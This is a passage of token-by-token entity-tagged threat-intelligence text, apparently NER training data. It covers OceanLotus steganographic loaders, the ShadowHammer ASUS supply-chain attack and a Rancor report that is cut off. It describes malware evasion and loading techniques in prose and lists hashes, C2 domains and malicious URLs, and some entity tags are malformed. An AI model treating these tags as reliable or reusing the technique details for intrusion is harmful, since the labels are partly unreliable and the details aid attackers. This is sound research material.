+code O
+performs O
+numerous O
+checks O
+for O
+the O
+CPU O
+features O
+, O
+and O
+based O
+on O
+the O
+outcome O
+, O
+it O
+will O
+choose O
+a O
+processor-specific O
+implementation O
+of O
+the O
+cryptographic O
+function O
+. O
+
+One O
+of O
+the O
+AES O
+implementations O
+makes O
+use O
+of O
+the O
+Intel S-IDTY
+AES-NI S-TOOL
+encryption O
+instruction O
+set O
+which O
+is O
+supported O
+by O
+several O
+modern O
+Intel S-IDTY
+and O
+AMD S-IDTY
+CPUs O
+. O
+
+The O
+decrypted O
+payload O
+undergoes O
+one O
+final O
+transformation O
+, O
+where O
+it O
+is O
+XORed O
+with O
+the O
+first O
+byte O
+read O
+from O
+the O
+C:\Windows\system O
+. O
+ini O
+file O
+, O
+which O
+is O
+expected O
+to O
+begin O
+with O
+a O
+comment O
+character O
+" O
+; O
+" O
+( O
+0x3B O
+) O
+. O
+
+Performing O
+the O
+same O
+steps O
+in O
+CyberChef S-TOOL
+, O
+it O
+is O
+possible O
+to O
+decode O
+the O
+encrypted O
+payload O
+, O
+which O
+should O
+yield O
+x86 O
+shellcode O
+, O
+starting O
+with O
+a O
+call O
+immediate O
+opcode O
+sequence O
+. O
+
+Varies S-MAL
+: O
+
+4c02b13441264bf18cc63603b767c3d804a545a60c66ca60512ee59abba28d4d S-SHA2
+Malware/Backdoor O
+658 O
+KB O
+( O
+674 O
+, O
+304 O
+bytes O
+) O
+PE32 O
+executable O
+for O
+MS O
+Windows S-OS
+( O
+DLL S-TOOL
+) O
+( O
+console O
+) O
+Intel S-IDTY
+80386 O
+32-bit O
+September B-TIME
+2018 E-TIME
+. O
+
+While O
+this O
+loader O
+differs O
+somewhat O
+in O
+general O
+implementation O
+, O
+the O
+payload O
+extraction O
+routine O
+seems O
+to O
+be O
+the O
+same O
+as O
+in O
+the O
+previous O
+variant O
+. O
+
+The O
+main O
+differences O
+are O
+: O
+
+The O
+way O
+the O
+decryption O
+routine O
+is O
+called O
+( O
+from O
+within O
+the O
+DllMain S-TOOL
+function O
+, O
+as O
+opposed O
+to O
+an O
+exported O
+function O
+) O
+. O
+
+The O
+way O
+the O
+payload O
+is O
+invoked O
+( O
+by O
+overwriting O
+the O
+return O
+address O
+on O
+the O
+stack O
+, O
+as O
+opposed O
+to O
+a O
+direct O
+call O
+) O
+. O
+
+Implementation O
+of O
+an O
+additional O
+anti-analysis O
+check O
+that O
+compares O
+the O
+name O
+of O
+the O
+parent O
+process O
+to O
+a O
+string O
+stored O
+in O
+an O
+encrypted O
+resource O
+. O
+
+We O
+came O
+across O
+multiple O
+variations O
+of O
+this O
+DLL S-TOOL
+containing O
+different O
+parent O
+process O
+names O
+, O
+possibly O
+targeted O
+specifically O
+to O
+the O
+victim’s O
+environment O
+. O
+
+Some O
+of O
+these O
+names O
+include O
+processes O
+related O
+to O
+security O
+software O
+: O
+
+wsc_proxy.exe S-FILE
+plugins-setup.exe S-FILE
+SoftManager.exe S-FILE
+GetEFA.exe S-FILE
+. O
+
+Features O
+: O
+
+Side-loaded O
+DLL S-TOOL
+Anti-debugging/anti-sandboxing O
+check O
+for O
+parent O
+process O
+name O
+. O
+
+Loads O
+next-stage O
+payload O
+using O
+custom B-TOOL
+.png I-TOOL
+steganography E-TOOL
+. O
+
+Uses O
+AES128 S-ENCR
+implementation O
+from O
+Crypto++ B-TOOL
+library E-TOOL
+for O
+payload O
+decryption O
+. O
+
+Executes O
+the O
+payload O
+by O
+overwriting O
+the O
+return O
+address O
+on O
+the O
+stack O
+. O
+
+Known O
+to O
+load O
+an O
+updated O
+version O
+of O
+Remy B-MAL
+backdoor E-MAL
+. O
+
+This O
+DLL S-TOOL
+does O
+not O
+contain O
+an O
+export O
+table O
+and O
+its O
+entire O
+functionality O
+resides O
+in O
+the O
+DllMain S-TOOL
+routine O
+. O
+
+Upon O
+execution O
+, O
+the O
+malware O
+will O
+first O
+decrypt O
+a O
+string O
+from O
+its O
+resources O
+and O
+compare O
+it O
+against O
+the O
+name O
+of O
+the O
+parent O
+process O
+. O
+
+If O
+the O
+names O
+differ O
+, O
+the O
+malware O
+will O
+simply O
+exit O
+without O
+touching O
+the O
+payload O
+. O
+
+The O
+resource O
+containing O
+the O
+expected O
+process O
+name O
+( O
+ICON/1 O
+) O
+is O
+XORed O
+with O
+the O
+first O
+byte O
+of O
+the O
+legitimate O
+C:\Windows\system.ini S-FILE
+file O
+– O
+0x3B O
+( O
+" O
+; O
+" O
+) O
+. O
+
+If O
+the O
+parent O
+name O
+matches O
+, O
+the O
+malware O
+will O
+traverse O
+the O
+stack O
+in O
+order O
+to O
+find O
+a O
+return O
+address O
+that O
+falls O
+into O
+the O
+memory O
+of O
+the O
+parent O
+process’s O
+text O
+section O
+. O
+
+Next O
+, O
+the O
+payload O
+is O
+read O
+from O
+the O
+.png O
+cover O
+file O
+, O
+which O
+seems O
+to O
+have O
+been O
+taken O
+from O
+an O
+inspirational O
+quotes O
+website3 O
+. O
+
+In O
+this O
+instance O
+, O
+the O
+payload O
+is O
+fully O
+contained O
+within O
+the O
+image’s O
+pixel O
+color O
+codes O
+, O
+leaving O
+no O
+remaining O
+data O
+beyond O
+the O
+IEND O
+marker O
+. O
+
+Finally O
+, O
+the O
+loader O
+will O
+decrypt O
+the O
+payload O
+to O
+a O
+memory O
+buffer O
+and O
+overwrite O
+the O
+previously O
+found O
+return O
+address O
+with O
+the O
+pointer O
+to O
+that O
+buffer O
+, O
+ensuring O
+that O
+the O
+malicious O
+shellcode O
+will O
+be O
+executed O
+when O
+the O
+DLL S-TOOL
+attempts O
+to O
+return O
+to O
+the O
+caller O
+. O
+
+The O
+loader O
+embedded O
+in O
+the O
+payload O
+seems O
+to O
+be O
+a O
+variant O
+of O
+the O
+Veil S-TOOL
+" O
+shellcode_inject S-TOOL
+" O
+payload O
+, O
+previously O
+used O
+by O
+OceanLotus S-APT
+to O
+load O
+older O
+versions O
+of O
+Remy B-MAL
+backdoor E-MAL
+. O
+
+In O
+this O
+instance O
+, O
+the O
+shellcode O
+is O
+configured O
+to O
+load O
+an O
+encoded O
+backdoor O
+from O
+within O
+the O
+payload O
+. O
+
+The O
+final O
+payload O
+comes O
+in O
+a O
+form O
+of O
+a O
+launcher O
+DLL S-TOOL
+that O
+contains O
+an O
+encrypted O
+backdoor O
+in O
+its O
+.rdata O
+section O
+and O
+a O
+plain-text O
+configuration O
+in O
+its O
+resources O
+. O
+
+The O
+resources O
+also O
+store O
+one O
+or O
+more O
+C2 S-TOOL
+communication O
+modules O
+. O
+
+The O
+backdoor O
+DLL S-TOOL
+and O
+the O
+C2 S-TOOL
+communication O
+DLLs O
+are O
+heavily O
+obfuscated O
+using O
+high O
+quantities O
+of O
+junk O
+code O
+, O
+which O
+significantly O
+inflates O
+their O
+size O
+and O
+makes O
+both O
+static O
+analysis O
+and O
+debugging O
+more O
+difficult O
+. O
+
+In O
+addition O
+to O
+Denes S-MAL
+and O
+Remy B-MAL
+backdoors E-MAL
+, O
+at O
+least O
+two O
+different O
+communication O
+modules O
+were O
+observed O
+with O
+different O
+versions O
+of O
+this O
+launcher O
+– O
+DNSProvider S-TOOL
+and O
+HTTPProv S-TOOL
+. O
+
+The O
+launcher O
+binary O
+, O
+which O
+contains O
+the O
+final O
+backdoor O
+, O
+is O
+RC4 S-ENCR
+encrypted O
+and O
+wrapped O
+in O
+a O
+layer O
+of O
+obfuscated O
+shellcode O
+. O
+
+We O
+can O
+see O
+the O
+familiar O
+DOS O
+stub O
+in O
+plain O
+text O
+, O
+but O
+the O
+rest O
+of O
+the O
+header O
+and O
+binary O
+body O
+are O
+encrypted O
+. O
+
+The O
+shellcode O
+is O
+obfuscated O
+using O
+OceanLotus S-APT
+’s O
+standard O
+approach O
+of O
+flattening O
+the O
+control O
+flow O
+and O
+inserting O
+junk O
+opcodes O
+( O
+as O
+described O
+in O
+the O
+ESET S-SECTEAM
+white O
+paper O
+on O
+OceanLotus S-APT
+) O
+. O
+
+The O
+shellcode O
+starts O
+in O
+a O
+fairly O
+standard O
+way O
+– O
+by O
+walking O
+the O
+list O
+of O
+loaded O
+modules O
+in O
+order O
+to O
+find O
+the O
+base O
+of O
+kernel32.dll S-FILE
+library O
+. O
+
+Once O
+kernel32 S-TOOL
+base O
+is O
+found O
+, O
+the O
+shellcode O
+will O
+calculate O
+the O
+addresses O
+of O
+LoadLibraryA S-TOOL
+and O
+GetProcAddress S-TOOL
+functions O
+, O
+and O
+use O
+them O
+to O
+resolve O
+other O
+necessary O
+APIs S-TOOL
+, O
+which O
+include O
+VirtualAlloc S-TOOL
+, O
+RtlMoveMemory S-TOOL
+, O
+and O
+RtlZeroMemory S-TOOL
+. O
+
+After O
+resolving O
+the O
+APIs S-TOOL
+, O
+the O
+shellcode O
+will O
+decrypt O
+the O
+launcher O
+binary O
+and O
+load O
+it O
+to O
+the O
+memory O
+. O
+
+MZ O
+header O
+, O
+PE O
+header O
+, O
+as O
+well O
+as O
+each O
+section O
+and O
+their O
+header O
+, O
+are O
+decrypted O
+separately O
+using O
+RC4 S-TOOL
+algorithm O
+and O
+a O
+hardcoded O
+key O
+. O
+
+Once O
+all O
+sections O
+are O
+loaded O
+, O
+the O
+relocations O
+get O
+fixed O
+and O
+the O
+MZ/PE O
+headers O
+are O
+zeroed O
+out O
+in O
+memory O
+. O
+
+The O
+shellcode O
+then O
+proceeds O
+to O
+execute O
+the O
+payload O
+DLL’s O
+entry O
+point O
+. O
+
+The O
+Internal O
+name O
+of O
+this O
+DLL S-TOOL
+is O
+a O
+randomly O
+looking O
+CLSID S-TOOL
+and O
+it O
+only O
+exports O
+one O
+function O
+called O
+DllEntry S-TOOL
+. O
+
+Upon O
+execution O
+, O
+the O
+launcher O
+will O
+attempt O
+to O
+hook O
+legitimate O
+wininet.dll S-FILE
+library O
+by O
+overwriting O
+its O
+entry O
+point O
+in O
+memory O
+with O
+the O
+address O
+of O
+a O
+malicious O
+routine O
+. O
+
+If O
+successful O
+, O
+every O
+time O
+the O
+system O
+loads O
+wininet.dll S-FILE
+, O
+the O
+entry O
+point O
+of O
+the O
+subsequently O
+dropped O
+backdoor O
+DLL S-TOOL
+will O
+be O
+executed O
+before O
+the O
+original O
+wininet O
+entry O
+point O
+. O
+
+There O
+is O
+no O
+proper O
+DLL S-TOOL
+injection O
+routine O
+– O
+the O
+payload O
+is O
+just O
+decompressed O
+to O
+the O
+memory O
+as-is O
+– O
+so O
+the O
+malware O
+needs O
+to O
+fix O
+all O
+the O
+pointers O
+in O
+the O
+decompressed O
+code O
+, O
+which O
+is O
+done O
+on O
+a O
+one-by-one O
+basis O
+using O
+hardcoded O
+values O
+and O
+offsets O
+. O
+
+This O
+part O
+takes O
+90% O
+of O
+the O
+whole O
+launcher O
+code O
+and O
+includes O
+over O
+11 O
+, O
+000 O
+modifications O
+. O
+
+The O
+launcher O
+then O
+calls O
+the O
+backdoor O
+DLL’s O
+entry O
+point O
+. O
+
+The O
+routine O
+that O
+reads O
+configuration O
+from O
+resources O
+and O
+decompresses O
+the O
+C2 S-TOOL
+communication O
+library O
+is O
+then O
+called O
+by O
+temporarily O
+replacing O
+the O
+pointer O
+to O
+CComCriticalSection S-TOOL
+function O
+with O
+the O
+pointer O
+to O
+that O
+routine O
+. O
+
+Such O
+an O
+obfuscation O
+method O
+makes O
+it O
+difficult O
+to O
+spot O
+it O
+in O
+the O
+code O
+. O
+
+The O
+launcher O
+loads O
+configuration O
+from O
+resources O
+and O
+uses O
+an O
+export O
+from O
+the O
+backdoor O
+DLL S-TOOL
+to O
+initialize O
+config O
+values O
+in O
+memory O
+. O
+
+Resource O
+P1/1 O
+contains O
+config O
+values O
+, O
+including O
+port O
+number O
+and O
+a O
+registry O
+path O
+. O
+
+After O
+the O
+content O
+of O
+resource O
+0xC8 O
+is O
+decompressed O
+, O
+another O
+function O
+from O
+the O
+backdoor O
+DLL S-TOOL
+is O
+used O
+to O
+load O
+the O
+C2 S-TOOL
+communication O
+module O
+to O
+the O
+memory O
+and O
+call O
+its O
+" O
+CreateInstance S-TOOL
+" O
+export O
+. O
+
+Finally O
+, O
+the O
+launcher O
+passes O
+control O
+to O
+the O
+main O
+backdoor O
+routine O
+. O
+
+OceanLotus S-APT
+: O
+0 O
+4 O
+name O
+is O
+read O
+from O
+resource O
+P1/0x64 O
+. O
+
+OceanLotus S-APT
+: O
+{12C044FA-A4AB-433B-88A2-32C3451476CE} O
+memory O
+pointer O
+4 O
+points O
+to O
+a O
+function O
+that O
+spawns O
+another O
+copy O
+of O
+malicious O
+process O
+. O
+
+OceanLotus S-APT
+: O
+{9E3BD021-B5AD-49DEAE93-F178329EE0FE} O
+C&C O
+URLs O
+varies O
+content O
+is O
+read O
+from O
+resource O
+P1/2 O
+. O
+
+OceanLotus S-APT
+: O
+0 O
+config O
+varies O
+content O
+is O
+read O
+from O
+resource O
+P1/1 O
+. O
+
+OceanLotus S-APT
+: O
+{B578B063-93FB-4A5F-82B4-4E6C5EBD393B} O
+? O
+4 O
+0 O
+( O
+config+0x486 O
+) O
+. O
+
+OceanLotus S-APT
+: O
+{5035383A-F7B0-424A-9C9A-CA667416BA6F} O
+port O
+number O
+4 O
+0x1BB O
+( O
+443 O
+) O
+( O
+config+0x46C O
+) O
+. O
+
+OceanLotus S-APT
+: O
+{68DDB1F1-E31F-42A9-A35D-984B99ECBAAD} O
+registry O
+path O
+varies O
+SOFTWARE\Classes\CLSID\{57C3E2E2-C18F-4ABF-BAAA-9D17879AB029} O
+. O
+
+The O
+backdoor O
+DLL S-TOOL
+is O
+stored O
+in O
+the O
+.rdata O
+section O
+of O
+the O
+launcher O
+, O
+compressed O
+with O
+LZMA S-TOOL
+, O
+and O
+encrypted O
+with O
+RC4 S-TOOL
+. O
+
+The O
+binary O
+is O
+heavily O
+obfuscated O
+with O
+overlapping O
+blocks O
+of O
+garbage O
+code O
+enclosed O
+in O
+pushf/popf O
+instructions O
+. O
+
+The O
+DllMain S-TOOL
+function O
+replaces O
+the O
+pointer O
+to O
+GetModuleHandleA B-TOOL
+API E-TOOL
+with O
+a O
+pointer O
+to O
+hook O
+routine O
+that O
+will O
+return O
+the O
+base O
+of O
+the O
+backdoor O
+DLL S-TOOL
+when O
+called O
+with O
+NULL O
+as O
+parameter O
+( O
+instead O
+of O
+returing O
+the O
+handle O
+to O
+the O
+launcher O
+DLL S-TOOL
+) O
+. O
+
+The O
+backdoor O
+also O
+contains O
+an O
+export O
+that O
+loads O
+the O
+C2 S-TOOL
+communication O
+module O
+reflectively O
+to O
+the O
+memory O
+from O
+resource O
+passed O
+as O
+parameter O
+and O
+then O
+calls O
+its O
+" O
+CreateInstance S-TOOL
+" O
+export O
+. O
+
+While O
+we O
+are O
+still O
+in O
+the O
+process O
+of O
+analyzing O
+this O
+backdoor’s O
+full O
+functionality O
+, O
+it O
+seems O
+to O
+be O
+similar O
+to O
+the O
+Remy B-MAL
+backdoor E-MAL
+described O
+in O
+our O
+previous O
+whitepaper O
+on O
+OceanLotus S-APT
+malware O
+. O
+
+This O
+DLL S-TOOL
+is O
+stored O
+in O
+the O
+launcher’s O
+resources O
+and O
+compressed O
+with O
+LZMA S-TOOL
+. O
+
+It’s O
+also O
+heavily O
+obfuscated O
+, O
+but O
+in O
+a O
+slightly O
+different O
+way O
+than O
+the O
+backdoor O
+. O
+
+Although O
+it O
+doesn’t O
+contain O
+an O
+internal O
+name O
+, O
+we O
+believe O
+it’s O
+a O
+variant O
+of O
+HttpProv B-TOOL
+library E-TOOL
+, O
+as O
+described O
+in O
+the O
+ESET S-SECTEAM
+white O
+paper O
+on O
+OceanLotus S-APT
+. O
+
+This O
+module O
+is O
+used O
+by O
+the O
+backdoor O
+during O
+HTTP/HTTPS O
+communication O
+with O
+the O
+C2 S-TOOL
+server O
+and O
+has O
+a O
+proxy O
+bypass O
+functionality O
+. O
+
+OceanLotus S-APT
+: O
+ae1b6f50b166024f960ac792697cd688be9288601f423c15abbc755c66b6daa4 S-SHA2
+Loader O
+#1 O
+. O
+
+OceanLotus S-APT
+: O
+0ee693e714be91fd947954daee85d2cd8d3602e9d8a840d520a2b17f7c80d999 S-SHA2
+Loader O
+#1 O
+. O
+
+OceanLotus S-APT
+: O
+a2719f203c3e8dcdcc714dd3c1b60a4cbb5f7d7296dbb88b2a756d85bf0e9c1e S-SHA2
+Loader O
+#1 O
+. O
+
+OceanLotus S-APT
+: O
+4c02b13441264bf18cc63603b767c3d804a545a60c66ca60512ee59abba28d4d S-SHA2
+Loader O
+#2 O
+. O
+
+OceanLotus S-APT
+: O
+e0fc83e57fbbb81cbd07444a61e56e0400f7c54f80242289779853e38beb341e S-SHA2
+Loader O
+#2 O
+. O
+
+OceanLotus S-APT
+: O
+cd67415dd634fd202fa1f05aa26233c74dc85332f70e11469e02b370f3943b1d S-SHA2
+Loader O
+#2 O
+. O
+
+OceanLotus S-APT
+: O
+9112f23e15fdcf14a58afa424d527f124a4170f57bd7411c82a8cdc716f6e934 S-SHA2
+Loader O
+#2 O
+. O
+
+OceanLotus S-APT
+: O
+ecaeb1b321472f89b6b3c5fb87ec3df3d43a10894d18b575d98287b81363626f S-SHA2
+Loader O
+#2 O
+. O
+
+OceanLotus S-APT
+: O
+478cc5faadd99051a5ab48012c494a807c7782132ba4f33b9ad9229a696f6382 S-SHA2
+Loader O
+#2 O
+. O
+
+OceanLotus S-APT
+: O
+72441fe221c6a25b3792d18f491c68254e965b0401a845829a292a1d70b2e49a S-SHA2
+Payload O
+PNG O
+( O
+loader O
+#1 O
+) O
+. O
+
+OceanLotus S-APT
+: O
+11b4c284b3c8b12e83da0b85f59a589e8e46894fa749b847873ed6bab2029c0f S-SHA2
+Payload O
+PNG O
+( O
+loader O
+#2 O
+) O
+. O
+
+OceanLotus S-APT
+: O
+d78a83e9bf4511c33eaab9a33ebf7ccc16e104301a7567dd77ac3294474efced S-SHA2
+Payload O
+PNG O
+( O
+loader O
+#2 O
+) O
+. O
+
+OceanLotus S-APT
+: O
+E:\ProjectGit\SHELL\BrokenSheild\BrokenShieldPrj\Bin\x86\Release\DllExportx86.pdb S-FILE
+Loader O
+#1 O
+. O
+
+OceanLotus S-APT
+: O
+C:\Users\Meister\Documents\Projects\BrokenShield\Bin\x86\Release\BrokenShield.pdb S-FILE
+Loader O
+#2 O
+. O
+
+OceanLotus S-APT
+: O
+kermacrescen.com S-DOM
+7244 O
+. O
+
+OceanLotus S-APT
+: O
+stellefaff.com S-DOM
+7244 O
+. O
+
+OceanLotus S-APT
+: O
+manongrover.com S-DOM
+7244 O
+. O
+
+OceanLotus S-APT
+: O
+background.ristians.com:8888 S-DOM
+11b4 O
+. O
+
+OceanLotus S-APT
+: O
+enum.arkoorr.com:8531 S-DOM
+11b4 O
+. O
+
+OceanLotus S-APT
+: O
+worker.baraeme.com:8888 S-DOM
+11b4 O
+. O
+
+OceanLotus S-APT
+: O
+enum.arkoorr.com:8888 S-DOM
+11b4 O
+. O
+
+OceanLotus S-APT
+: O
+worker.baraeme.com:8531 S-DOM
+11b4 O
+. O
+
+OceanLotus S-APT
+: O
+plan.evillese.com:8531 S-DOM
+11b4 O
+. O
+
+OceanLotus S-APT
+: O
+background.ristians.com:8531 S-DOM
+11b4 O
+. O
+
+OceanLotus S-APT
+: O
+plan.evillese.com:8888 S-DOM
+11b4 O
+. O
+
+OceanLotus S-APT
+: O
+SOFTWARE\Classes\CLSID\{E3517E26-8E93-458D-A6DF-8030BC80528B} O
+7244 O
+. O
+
+OceanLotus S-APT
+: O
+SOFTWARE\App\AppX06c7130ad61f4f60b50394b8cba3d35f\Applicationz S-TOOL
+7244 O
+. O
+
+OceanLotus S-APT
+: O
+SOFTWARE\Classes\CLSID\{57C3E2E2-C18F-4ABF-BAAA-9D17879AB029} O
+11b4 O
+. O
+
+
+Operation O
+ShadowHammer S-ACT
+. O
+
+Earlier O
+today O
+, O
+Motherboard S-IDTY
+published O
+a O
+story O
+by O
+Kim O
+Zetter O
+on O
+Operation O
+ShadowHammer S-ACT
+, O
+a O
+newly O
+discovered O
+supply B-ACT
+chain I-ACT
+attack E-ACT
+that O
+leveraged O
+ASUS B-TOOL
+Live I-TOOL
+Update E-TOOL
+software O
+. O
+
+While O
+the O
+investigation O
+is O
+still O
+in O
+progress O
+and O
+full O
+results O
+and O
+technical O
+paper O
+will O
+be O
+published O
+during O
+SAS O
+2019 S-TIME
+conference O
+in O
+Singapore S-LOC
+, O
+we O
+would O
+like O
+to O
+share O
+some O
+important O
+details O
+about O
+the O
+attack O
+. O
+
+In O
+January B-TIME
+2019 E-TIME
+, O
+we O
+discovered O
+a O
+sophisticated O
+supply B-ACT
+chain I-ACT
+attack E-ACT
+involving O
+the O
+ASUS B-TOOL
+Live I-TOOL
+Update I-TOOL
+Utility E-TOOL
+. O
+
+The O
+attack O
+took O
+place O
+between O
+June S-TIME
+and O
+November B-TIME
+2018 E-TIME
+and O
+according O
+to O
+our O
+telemetry O
+, O
+it O
+affected O
+a O
+large O
+number O
+of O
+users O
+. O
+
+ASUS B-TOOL
+Live I-TOOL
+Update E-TOOL
+is O
+an O
+utility O
+that O
+is O
+pre-installed O
+on O
+most O
+ASUS S-IDTY
+computers O
+and O
+is O
+used O
+to O
+automatically O
+update O
+certain O
+components O
+such O
+as O
+BIOS S-TOOL
+, O
+UEFI S-TOOL
+, O
+drivers S-TOOL
+and O
+applications S-TOOL
+. O
+
+According O
+to O
+Gartner S-IDTY
+, O
+ASUS S-IDTY
+is O
+the O
+world’s O
+5th-largest O
+PC O
+vendor O
+by O
+2017 S-TIME
+unit O
+sales O
+. O
+
+This O
+makes O
+it O
+an O
+extremely O
+attractive O
+target O
+for O
+APT O
+groups O
+that O
+might O
+want O
+to O
+take O
+advantage O
+of O
+their O
+userbase O
+. O
+
+Based O
+on O
+our O
+statistics O
+, O
+over O
+57 O
+, O
+000 O
+Kaspersky S-SECTEAM
+users O
+have O
+downloaded O
+and O
+installed O
+the O
+backdoored O
+version O
+of O
+ASUS B-TOOL
+Live I-TOOL
+Update E-TOOL
+at O
+some O
+point O
+in O
+time O
+. O
+
+We O
+are O
+not O
+able O
+to O
+calculate O
+the O
+total O
+count O
+of O
+affected O
+users O
+based O
+only O
+on O
+our O
+data O
+; O
+however O
+, O
+we O
+estimate O
+that O
+the O
+real O
+scale O
+of O
+the O
+problem O
+is O
+much O
+bigger O
+and O
+is O
+possibly O
+affecting O
+over O
+a O
+million O
+users O
+worldwide O
+. O
+
+The O
+goal O
+of O
+the O
+attack O
+was O
+to O
+surgically O
+target O
+an O
+unknown O
+pool O
+of O
+users O
+, O
+which O
+were O
+identified O
+by O
+their O
+network O
+adapters’ O
+MAC O
+addresses O
+. O
+
+To O
+achieve O
+this O
+, O
+the O
+attackers O
+had O
+hardcoded O
+a O
+list O
+of O
+MAC O
+addresses O
+in O
+the O
+trojanized O
+samples O
+and O
+this O
+list O
+was O
+used O
+to O
+identify O
+the O
+actual O
+intended O
+targets O
+of O
+this O
+massive O
+operation O
+. O
+
+We O
+were O
+able O
+to O
+extract O
+more O
+than O
+600 O
+unique O
+MAC O
+addresses O
+from O
+over O
+200 O
+samples O
+used O
+in O
+this O
+attack O
+. O
+
+Of O
+course O
+, O
+there O
+might O
+be O
+other O
+samples O
+out O
+there O
+with O
+different O
+MAC O
+addresses O
+in O
+their O
+list O
+. O
+
+We O
+believe O
+this O
+to O
+be O
+a O
+very O
+sophisticated O
+supply B-ACT
+chain I-ACT
+attack E-ACT
+, O
+which O
+matches O
+or O
+even O
+surpasses O
+the O
+Shadowpad S-ACT
+and O
+the O
+CCleaner S-ACT
+incidents O
+in O
+complexity O
+and O
+techniques O
+. O
+
+The O
+reason O
+that O
+it O
+stayed O
+undetected O
+for O
+so O
+long O
+is O
+partly O
+due O
+to O
+the O
+fact O
+that O
+the O
+trojanized O
+updaters O
+were O
+signed O
+with O
+legitimate O
+certificates O
+( O
+eg O
+: O
+“ O
+ASUSTeK O
+Computer O
+Inc. O
+” O
+) O
+. O
+
+The O
+malicious O
+updaters O
+were O
+hosted O
+on O
+the O
+official O
+liveupdate01s.asus.com S-URL
+and O
+liveupdate01.asus.com S-URL
+ASUS S-IDTY
+update O
+servers O
+. O
+
+We O
+have O
+contacted O
+ASUS S-IDTY
+and O
+informed O
+them O
+about O
+the O
+attack O
+on O
+Jan B-TIME
+31 I-TIME
+, I-TIME
+2019 E-TIME
+, O
+supporting O
+their O
+investigation O
+with O
+IOCs O
+and O
+descriptions O
+of O
+the O
+malware O
+. O
+
+Although O
+precise O
+attribution O
+is O
+not O
+available O
+at O
+the O
+moment O
+, O
+certain O
+evidence O
+we O
+have O
+collected O
+allows O
+us O
+to O
+link O
+this O
+attack O
+to O
+the O
+ShadowPad S-ACT
+incident O
+from O
+2017 S-TIME
+. O
+
+The O
+actor O
+behind O
+the O
+ShadowPad S-ACT
+incident O
+has O
+been O
+publicly O
+identified O
+by O
+Microsoft S-IDTY
+in O
+court O
+documents O
+as O
+BARIUM S-APT
+. O
+
+BARIUM S-APT
+is O
+an O
+APT O
+actor O
+known O
+to O
+be O
+using O
+the O
+Winnti B-MAL
+backdoor E-MAL
+. O
+
+Recently O
+, O
+our O
+colleagues O
+from O
+ESET S-SECTEAM
+wrote O
+about O
+another O
+supply B-ACT
+chain I-ACT
+attack E-ACT
+in O
+which O
+BARIUM S-APT
+was O
+also O
+involved O
+, O
+that O
+we O
+believe O
+is O
+connected O
+to O
+this O
+case O
+as O
+well O
+. O
+
+It O
+should O
+be O
+noted O
+that O
+the O
+numbers O
+are O
+also O
+highly O
+influenced O
+by O
+the O
+distribution O
+of O
+Kaspersky S-SECTEAM
+users O
+around O
+the O
+world O
+. O
+
+In O
+principle O
+, O
+the O
+distribution O
+of O
+victims O
+should O
+match O
+the O
+distribution O
+of O
+ASUS O
+users O
+around O
+the O
+world O
+. O
+
+We’ve O
+also O
+created O
+a O
+tool O
+which O
+can O
+be O
+run O
+to O
+determine O
+if O
+your O
+computer O
+has O
+been O
+one O
+of O
+the O
+surgically O
+selected O
+targets O
+of O
+this O
+attack O
+. O
+
+To O
+check O
+this O
+, O
+it O
+compares O
+MAC O
+addresses O
+of O
+all O
+adapters O
+to O
+a O
+list O
+of O
+predefined O
+values O
+hardcoded O
+in O
+the O
+malware O
+and O
+alerts O
+if O
+a O
+match O
+was O
+found O
+. O
+
+Download O
+an O
+archive O
+with O
+the O
+tool O
+( O
+.exe S-FILE
+) O
+. O
+
+Also O
+, O
+you O
+may O
+check O
+MAC O
+addresses O
+online O
+. O
+
+If O
+you O
+discover O
+that O
+you O
+have O
+been O
+targeted O
+by O
+this O
+operation O
+, O
+please O
+e-mail S-TOOL
+us O
+at O
+: O
+shadowhammer@kaspersky.com O
+. O
+
+Kaspersky B-SECTEAM
+Lab E-SECTEAM
+verdicts O
+for O
+the O
+malware O
+used O
+in O
+this O
+and O
+related O
+attacks O
+. O
+
+ShadowHammer S-APT
+: O
+HEUR S-MAL
+: O
+Trojan.Win32.ShadowHammer.gen S-MAL
+. O
+
+ShadowHammer S-APT
+: O
+asushotfix.com S-URL
+. O
+
+ShadowHammer S-APT
+: O
+141.105.71.116 S-IP
+. O
+
+ShadowHammer S-APT
+: O
+http://liveupdate01.asus.com/pub/ASUS/nb/Apps_for_Win8/LiveUpdate/Liveupdate_Test_VER365.zip S-URL
+. O
+
+ShadowHammer S-APT
+: O
+https://liveupdate01s.asus.com/pub/ASUS/nb/Apps_for_Win8/LiveUpdate/Liveupdate_Test_VER362.zip S-URL
+. O
+
+ShadowHammer S-APT
+: O
+https://liveupdate01s.asus.com/pub/ASUS/nb/Apps_for_Win8/LiveUpdate/Liveupdate_Test_VER360.zip S-URL
+. O
+
+ShadowHammer S-APT
+: O
+https://liveupdate01s.asus.com/pub/ASUS/nb/Apps_for_Win8/LiveUpdate/Liveupdate_Test_VER359.zip S-URL
+. O
+
+ShadowHammer S-APT
+: O
+Liveupdate_Test_VER365.zip S-FILE
+. O
+
+ShadowHammer S-APT
+: O
+aa15eb28292321b586c27d8401703494 S-SHA1
+. O
+
+Rancor S-APT
+: O
+Cyber O
+Espionage O
+Group O
+Uses O
+New O
+Custom O
+Malware O
+to O
+Attack O
+Southeast B-LOC
+Asia E-LOC
+. O
+
+In O
+late B-TIME
+June I-TIME
+2018 E-TIME
+, O
+Unit B-SECTEAM
+42 E-SECTEAM
+revealed O
+a O
+previously O
+unknown O
+cyber O
+espionage O
+group O
+we O
+dubbed O
+Rancor S-APT
+, O
+which O
+conducted O
+targeted O
+attacks O
+in O
+Southeast B-LOC
+Asia E-LOC S-LOC
+throughout O
+2017 S-TIME
+and O
+2018 S-TIME
+. O
+
+In O
+recent O
+attacks O
+, O
+the O
+group O
+has O
+persistently O
+targeted O
+at O
+least O
+one O
+government B-IDTY
+organization I-IDTY
+in I-IDTY
+Cambodia B-LOC E-IDTY E-LOC
+from O
+December B-TIME
+2018 E-TIME
+through O
+January B-TIME
+2019 E-TIME
+. O
+
+While O
+researching O
+these O
+attacks O
+, O
+we O
+discovered O
+an O
+undocumented O
+, O
+custom O
+malware O
+family O
+– O
+which O
+we O
+’ve O
+named O
+Dudell S-MAL
+. O
+
+In O
+addition O
+, O
+we O
+discovered O
+the O
+group O
+using O
+Derusbi S-MAL
+, O
+which O
+is O
+a O
+malware O
+family O
+believed O
+to O
+be O
+unique O
+to O
+a O
+small O
+subset O
+of O
+Chinese O
+cyber O
+espionage O
+groups O
+. O
+
+Between O
+early B-TIME
+December I-TIME
+2018 E-TIME
+and O
+the O
+end B-TIME
+of I-TIME
+January I-TIME
+2019 E-TIME
+, O
+Rancor S-APT
+conducted O
+at O
+least O
+two O
+rounds O
+of O
+attacks O
+intending O
+to O
+install B-ACT
